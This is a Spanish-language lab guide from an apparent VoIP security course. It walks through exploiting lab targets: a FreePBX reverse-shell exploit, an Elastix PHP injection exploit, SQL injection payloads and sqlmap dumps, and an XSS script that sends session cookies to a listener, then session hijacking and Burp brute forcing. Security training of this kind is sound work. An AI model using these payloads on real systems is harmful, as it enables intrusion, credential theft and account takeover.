CURSO DE ASEGURAMIENTO ASTERISK / VOIP

Modulo 3
A.- Vulnerabilidades en Servicios WEB – Ataques externos.

Descripción: En este laboratorio se usaran los diferentes herramientas del proceso de evaluación
de seguridad de servicios WEB

Objetivo: Realizar explotación de vulnerabilidades a servicios WEB para determinar debilidad ante
ataques externos.

1.- Explotación de Vulnerabilidades en Aplicaciones Web VoIP

1.1.- Vulnerabilidad en Freepbx

Prueba de concepto del exploit que afecta la vulnerabilidad en Freepbx 2.10 (http://www.exploit-
db.com/exploits/18650/)

A) Verificar la dirección IP local y poner en escucha el puerto 443

# ifconfig eth0
# nc -lvp 443

B) Configuración del exploit

# vi exploit.py
rhost="10.51.1.43" -------> IP EXPLOTADA
lhost="10.51.1.40" ------> IP LOCAL
lport=443
extension="101"

C) Ejecución del exploit

# ./exploit.py

D) Desplegando comandos en la maquina comprometida

# ifconfig
# uname -a
# cat /etc/asterisk/sip_additional.conf
1.2.- PHP Code Injection Exploit en VTIGER 5.2.1 - Elastix 2.3

A) Configurar el exploit

# wget --no-check-certificate http://packetstormsecurity.com/files/download/119253/elastix23-

exec.txt
# mv elastix23-exec.txt elastix.php
# chmod a+wrx elastix.php

B) Solicitud de configuración del exploit

Ingresar la dirección IP del host atacado

# php elastix.php
Enter Target [https://ip] # https://192.168.10.142

C) Exploit completados
Si el exploit es exitoso, proporcionará una shell reversa que permita la ejecución de comandos

# id
# ifconfig
# cat /etc/passwd
# cat /etc/manager.conf
2.- Búsqueda automatizada de vulnerabilidades Web con ZAP PROXY

2.1.- Configurar el navegador para que escuche ZAP Proxy en el anfitrión

Editar/Preferencias/Avanzado/Red/Configuración
Configuración manual de proxy
Proxy http : 127.0.0.1
Puerto : 8080

2.2.- Iniciar OWASP ZAP PROXY

Ahora ingresar a la URL : http://testphp.vulnweb.com/login.php

Autenticarse con el usuario test y contraseña test

Una vez autenticado, regresar a ZAP Proxy y la URL a evaluar estará capturada.

2.3.- Activar los escaneo

Activar el spider
Activar el escaneo activo

Verificar Vulnerabilidades encontradas.

3.- Explotación de vulnerabilidades manuales de inyección de código SQL

- Poner comillas simple para determinar la vulnerabilidad

'

En base a eso se puede determinar el motor de bd

- Usar union, y mostrar el tema de la cantidad de las tablas

' union select 1 -- //

' union select 1,2 -- //

- Mostrar con que bd trabaja la app y el usuario

' UNION SELECT null,database() -- //

' UNION ALL SELECT system_user(),user(); -- //

- Invocar al schema (base schema,nombre bd) para determinar las bases de datos y tablas
en este caso determinar las tablas de la base de datos de la app

' union all SELECT table_schema,table_name FROM information_schema.tables; -- //

- Sacar los campos de la tabla que contiene los usuarios de la app

' union all select column_name,1 from information_schema.columns where table_schema = 'dvwa' and
table_name = 'users'; -- //

- Seleccionar los usuarios y contraseñas de la base de datos de la app

' union select user,password from users;

- Mostrar la sentencia que muestra el passwd

' union SELECT null,LOAD_FILE('/etc/passwd'); # //

' union SELECT null,LOAD_FILE(0x2f6574632f706173737764); # //
4.- Explotación de vulnerabilidades automatizadas de inyección de código SQL.

Capturar la variable de sesión

Luego ingresar nuevamente a DVWA , bajar el nivel de seguridad , ingresar a SQLI , e ingresar el
valor 1 e ir al botón submit

Finalmente ZAP Proxy , habrá capturado toda la transacción y copiaremos la cookie de sesión
como se muestra a continuación
Iniciando el ataque con SQLMAP

Verificando la vulnerabilidad
sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1"

Obteniendo información de usuario , hostname , si el usuario actual es DBA , y la base de datos

actual
sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1" --current-user --is-dba --
current-db --hostname

Obteniendo las base de datos

sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1" --dbs

Obteniendo las tablas

sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1" --tables

Obteniendo las columnas

sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1" --columns

Obteniendo el volcado de la base de datos

sqlmap --url="http://192.168.10.148/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --
cookie="security=low; PHPSESSID=6ga2n64ladeu484mhq5smua2t1" --dump
5.- Explotación de vulnerabilidades en XSS

5.1.- XSS reflejado

En DVWA Ir a XSS reflected

Probar con : Saludos
Ahora hacer el XSS :

<script>alert("HACKED")</script>

<script>alert(document.cookie)</script>

5.2.- XSS almacenado

En DVWA Ir a XSS stored
Probar con :

Name : pepe
Message : Esta buena la pagina

Otro
Name : Yo mismo
Message : <script>alert("HACKED")</script>

5.3.- Explotación de robo de sesiones desde un XSS Almacenado.

Objetivo : Capturar la cookie de sesión para in personar a un usuario, de una aplicación web vía
vulnerabilidad XSS.
1.- En el Equipo que captura el cookie

- Habilitar la escucha del puerto 80 en la maquina virtual en PIVOT

Recomendación : ingresar via putty a la maquina virtual en PIVOT y proceder.

#yum -y install nc
#nc -lv 80

2.- En el equipo atacante (Windows Anfitrion) implantar el XSS almacenado

- En DVWA Ir a XSS reflected usando Firefox desde Windows e insertar lo siguiente :

<script>new Image().src ='http://172.16.3.128/b.php?'+document.cookie;</script>

OJO : Donde la dirección IP es la que pertenece a la maquina con el puerto de escucha (Maquina
virtual Pivot)
Como se muestra no es posible insertar toda la cadena XSS, para es necesario activar la
inspección de elementos y luego modificar el limite del elemento TXTAREA de la siguiente forma.

Luego ya es posible ingresar todo el script , como se puede ver a continuación

Ahora pulsaremos en el “Sing Guestbook” para insertar y almacenar el XSS

Finalmente hacer logout del sistema DVWA

3.- En el equipo víctima (Maquina virtual Windows 7) ingresar al XSS almacenado

4.- Verificar en la maquina virtual PIVOT la captura de la Cookie
Luego veremos que en nuestro puerto de escucha habremos capturado los datos de la sesión

PHPSESSID=u9h5a2bm4birt348mo511ou7d7;%20acopendivids=swingset,jotto,phpbb2,redmine;
%20acgroupswithpersist=nada

5.- Desde el equipo atacante (Windows Anfitrion) recoger la Cookie y usarla

- Usar la cookie de sesión capturada, para iniciar sesión sin credenciales validas en la aplicación,
usando Burp suite de la siguiente forma :

Configurar el navegador para que escuche Burp en el anfitrión

Editar/Preferencias/Avanzado/Red/Configuración
Configuración manual de proxy
Proxy http : 127.0.0.1
Puerto : 8080

NOTA : la URL sera http://172.16.3.127/dvwa/

Luego hacer clic en la pestaña “Params” y modificar la variable PHPSESSID con el valor capturado
de la siguiente forma :
Finalmente hacer clic en el boton “Forward” y veremos que habremos ingresado sin contraseña.
6.- Explotación de ataques de fuerza bruta formularios.

Activar la interpretación el trafico con burp

luego tratar de loquearse con cualquier usuario "be" y contraseña "star"
Capturar el trafico con burp y hacer clic derecho y seleccionar "Send to Intruder"

Luego desactivar la capturar de proxy "Intercept off"

En la pestaña Intruder ir a la pestaña "Positions"
Luego hacer clic en el botón "Clear" para borrar todas las variables predefinidas
Luego en la pestaña Positions seleccionar "a" y hacer clic en el botón add y luego seleccionar "b" y
hacer clic nuevamente en el botón add"
En la misma ventana en la parte de "Attack type seleccionar "Cluster Bomp"
Luego ir a la pestaña "Payloads" y seleccionar En Payload set : 1 y agregar en "Payload options"

bee
user
admin
administrator

Luego seleccionar En Payload set : 2 y agregar en "Payload options"

bug
admin
administrator
password

AHora ir a la pestana "Options" y en la seccion "Grep - Match" eliminar todas las opciones con el
boton "Clealr" y agregar

Invalid credentials! Did you forgot your password?

Finalmente ir al menu "Intruder" / "Start Attack"
7.- Explotación de vulnerabilidades en el paso de parámetros web

Probar la funcionalidad pidiendo 1 o 10 tickets

Solicitar nuevamente 10 , hacer tamper de la trama y cambiar la variable precio